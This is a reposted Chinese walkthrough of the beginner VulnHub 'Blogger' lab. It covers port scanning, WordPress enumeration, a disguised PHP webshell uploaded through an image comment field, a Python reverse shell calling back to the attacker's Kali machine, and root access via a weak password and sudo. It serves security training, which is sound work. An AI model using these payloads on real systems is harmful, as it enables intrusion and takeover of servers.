您当前的位置:首页 > 电脑百科 > 网络技术 > 网络安全

网络安全实战分享 | 靶机 - blogger(转载)

时间:2022-05-10 09:37:18  来源:  作者:一个木橘猫

靶机下载:
https://www.vulnhub.com/entry/blogger-1%2C675/

难度: 初学者

描述:一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。有老哥试了需要安全模式 改网卡

目标: 拿到flag

环境搭建

由于靶机特点,需要搭建在VirtualBox ,所以在启动前配置网卡为桥接模式

双击 ova 文件导入 virtualBox,然后设置网卡模式

网络安全实战分享 | 靶机 - blogger(转载)

 

配置kali的网卡为 桥接模式

网络安全实战分享 | 靶机 - blogger(转载)

 

攻击机 kali linux :192.168.31.106

主机发现

nmap -sP 192.168.31.0/24 // 采用ping扫描存活主机

网络安全实战分享 | 靶机 - blogger(转载)

 

排除个人IP和已知网络IP后,存在一个异常IP地址: 192.168.31.73

进一步扫描 IP 地址开放的端口号

nmap -sV -sT -p- 192.168.31.73 // -sV 探测端口服务版本 -sT 全连接 -p- 全端口

网络安全实战分享 | 靶机 - blogger(转载)

 

扫描结束后,发现目标IP 开放了 2 个端口,SSH 可以采用爆破密码, HTTP服务可以通过常规 web 漏洞手段渗透,确认攻击方法后,优先挖掘 web 漏洞

后续可能会遇到跳转到域名访问情况, 将 blogger.thm 添加到 /etc/hosts 文件 或 C:windowsSystem32driversetchosts文件

web 应用程序- 漏洞发现

先进行目录爆破,使用工具 dirsearch 爆破路径

命令: Python/ target=_blank class=infotextkey>Python dirsearch.py -u http://192.168.31.73/

网络安全实战分享 | 靶机 - blogger(转载)

 

访问发现存在网站目录遍历,获取到web容器版本 2.4.18

网络安全实战分享 | 靶机 - blogger(转载)

 

访问路径 /fonts/blog时,发现 wAppalyzer 获取到更多的信息,确定当前存在wordPress/ target=_blank class=infotextkey>WordPress 环境

根据 wordpress 版本 寻找漏洞 (百度寻找公开漏洞poc或使用工具 wpscan)

Burp的插件-software vulnerability scanner 也可以帮助我们扫描到 wordpress 版本

网络安全实战分享 | 靶机 - blogger(转载)

 

使用wpscan 扫描域名

命令: wpscan --url http://192.168.31.73/

看起来 wordpress 开启了 xmlrpc , 但是利用 msf 扫描失败了

网络安全实战分享 | 靶机 - blogger(转载)

 

继续寻找漏洞,在阅读博客时发现有一款编辑器

在评论处发现可以上传图片,上传图片马测试

命令: copy 1.jpg/a +shell.php/b shell.jpg // 1.jpg为正常的图片,尽可能选择小点的图片,shell.php 为 php一句话木马

网络安全实战分享 | 靶机 - blogger(转载)

 

抓包,尝试修改图片后缀 为 php,(为了更好的截图,我删除了一部分HTTP 请求header)

网络安全实战分享 | 靶机 - blogger(转载)

 

随后通过返回的路径测试(也可以通过路径遍历找到上传php文件),发现绿了,拿到shell

网络安全实战分享 | 靶机 - blogger(转载)

 

寻找提权手段

存在数据库密码配置文件,发现登录返回500 错误

在 /home下发现当前 服务器存在三个用户 james ,ubuntu,vagrant ,利用 hydra 暴力破解用户 发现不允许密码登录、

利用弱密码在获得的shell上登录,发现蚁剑执行 su 受限制

网络安全实战分享 | 靶机 - blogger(转载)

 

尝试反弹shell在终端尝试重新上传一个 图片马,

网络安全实战分享 | 靶机 - blogger(转载)

 

kali 监听 本地端口 8888 命令: nc -lvvp 8888

利用system 函数 执行反弹shell命令,这里注意 enctype 的值,否则接收不到shell接下来获得一个交互式的shell

a=python3 -c 'import socket,subprocess,os;

s=socket.socket(socket.AF_.NET,socket.SOCK_STREAM);

s.connect(("192.168.31.106",8888));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'
尝试利用弱密码登录用户 vagrant

网络安全实战分享 | 靶机 - blogger(转载)

 

获取信息发现存在sudo 权限

sudo命令以系统管理者的身份执行指令,也就是说,经由 sudo 所执行的指令就好像是 root 亲自执行。

网络安全实战分享 | 靶机 - blogger(转载)

 

利用sudo su 提升到 root权限

网络安全实战分享 | 靶机 - blogger(转载)

 

在root 目录下得到 root.txt 文件

网络安全实战分享 | 靶机 - blogger(转载)

 

base64 解码得到如下内容

Hey There,

......

Here's Your Flag.

flag{W311_D0n3_Y0u_P3n3tr4t3d_M3 :)}

拿到 flag 就结束了,还有个flag 在james/user.txt 我这里就不展示了

总结

难度不大,考察了 文件上传,权限提升等漏洞,需要掌握基础知识即可挑战,适合入门安全从业人员以及兴趣爱好者。

坑点:这个靶机只能搭建在vb上,我在vmware上测试时只有一个没有分配ip地址,网卡启动有问题。

另外要注意,反弹shell和蚁剑执行的shell 还是有些许不同,在测试中可以多试试不同的方式。



Tags:靶机   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
网络安全实战分享 | 靶机 - blogger(转载)
靶机下载: https://www.vulnhub.com/entry/blogger-1%2C675/难度: 初学者描述:一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性...【详细内容】
2022-05-10  Search: 靶机  点击:(999)  评论:(0)  加入收藏
内网安全-记一次内网靶机渗透
所涉及到的知识点:1、WEB安全-漏洞发现及利用 2、系统安全-权限提升(漏洞&配置&逃逸) 3、内网安全-横向移动(口令传递&系统漏洞) 实战演练-ATT&CK实战系列-红队评估环境下载:...【详细内容】
2022-02-25  Search: 靶机  点击:(758)  评论:(0)  加入收藏
网络安全技术入门靶机分享
DC-6题目描述DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.This isn't an overly di...【详细内容】
2020-07-30  Search: 靶机  点击:(519)  评论:(0)  加入收藏
typhoon靶机渗透
前言&靶机简介这个靶机挺多漏洞,知识点很广,所以决定自己来打一遍,算是复习一些很久前的知识点,就从一个端口一个端口来渗透吧,看看有什么知识点端口扫描 25端口用户名枚举为啥选...【详细内容】
2020-06-10  Search: 靶机  点击:(812)  评论:(0)  加入收藏
▌简易百科推荐
网络安全行业的春天何时来?
2023年下半年开始,网络安全从业人员都感受到了网安行业的寒冬,但是其实前奏并不是此刻,只是涉及到大量裁员关乎自身而人人感同身受。从近五年各个网络安全上市公司财报可以发现...【详细内容】
2024-04-11  兰花豆说网络安全    Tags:网络安全   点击:(8)  评论:(0)  加入收藏
数据可视化在网络安全中的关键作用
在当今数字化时代,网络安全已成为各大企业乃至国家安全的重要组成部分。随着网络攻击的日益复杂和隐蔽,传统的网络安全防护措施已难以满足需求,急需新型的解决方案以增强网络防...【详细内容】
2024-03-29  小嵩鼠    Tags:数据可视化   点击:(22)  评论:(0)  加入收藏
AI时代的网络安全:探索AI生成的网络攻击
译者 | 晶颜审校 | 重楼长期以来,网络攻击一直是劳动密集型的,需要经过精心策划并投入大量的人工研究。然而,随着人工智能技术的出现,威胁行为者已经成功利用它们的能力,以非凡的...【详细内容】
2024-03-27    51CTO  Tags:网络安全   点击:(17)  评论:(0)  加入收藏
详解渗透测试和漏洞扫描的开源自动化解决方案
译者 | 刘涛审校 | 重楼目录 什么是渗透测试 规划和侦察 扫描 开发和获得访问权限 维持访问权 报告和控制 什么是漏洞扫描 渗透测试工具 渗透测试的自动化 渗透自动化工作流...【详细内容】
2024-02-27    51CTO  Tags:渗透测试   点击:(35)  评论:(0)  加入收藏
如何保护你的电脑不受黑客攻击
在数字时代,网络安全已经成为每个人必须关注的重要问题。黑客攻击、数据泄露和网络犯罪等事件频频发生,使得我们的个人隐私和财产安全面临严重威胁。那么,如何保护你的电脑不受...【详细内容】
2024-02-04  佳慧慧    Tags:黑客攻击   点击:(55)  评论:(0)  加入收藏
2024年需要高度关注的六大网络安全威胁
译者 | 晶颜审校 | 重楼创新技术(如生成式人工智能、无代码应用程序、自动化和物联网)的兴起和迅速采用,极大地改变了每个行业的全球网络安全和合规格局。网络犯罪分子正在转向...【详细内容】
2024-01-03    51CTO  Tags:网络安全威胁   点击:(113)  评论:(0)  加入收藏
终端设备通信网络安全防护方案
终端设备的网络安全是一个综合性问题,需要用户、组织和厂商共同努力,采取一系列的措施来保护终端设备的安全。终端设备网络安全防护方案主要包括以下几个方面:1. 强化用户身份...【详细内容】
2024-01-01  若水叁仟    Tags:网络安全   点击:(58)  评论:(0)  加入收藏
深入解析802.1X认证:网络安全的守护者
802.1X认证,对于很多人来说,可能只是一个陌生的技术名词。然而,在网络安全的领域中,它却扮演着守护者的角色。今天,我们就来深入解析802.1X认证,看看它是如何保护我们的网络安全的...【详细内容】
2023-12-31  韦希喜    Tags:网络安全   点击:(71)  评论:(0)  加入收藏
提升网络安全:ADSelfService Plus多重身份验证的关键
在当今数字化的时代,网络安全问题愈发突出,企业和组织面临着日益严峻的挑战。为了应对不断进化的网络威胁,越来越多的组织开始采用多层次的安全措施,其中多重身份验证成为了关键...【详细内容】
2023-12-27  运维有小邓    Tags:网络安全   点击:(88)  评论:(0)  加入收藏
企业如何应对网络钓鱼攻击的激增?
随着我们进入数字时代,网络犯罪的威胁继续以惊人的速度增长。在最流行的网络犯罪形式中,网络钓鱼仅在过去一年就出现了472%的攻击激增。企业在保护自己及其客户免受网络钓鱼诈...【详细内容】
2023-12-19    千家网  Tags:钓鱼攻击   点击:(90)  评论:(0)  加入收藏
站内最新
站内热门
站内头条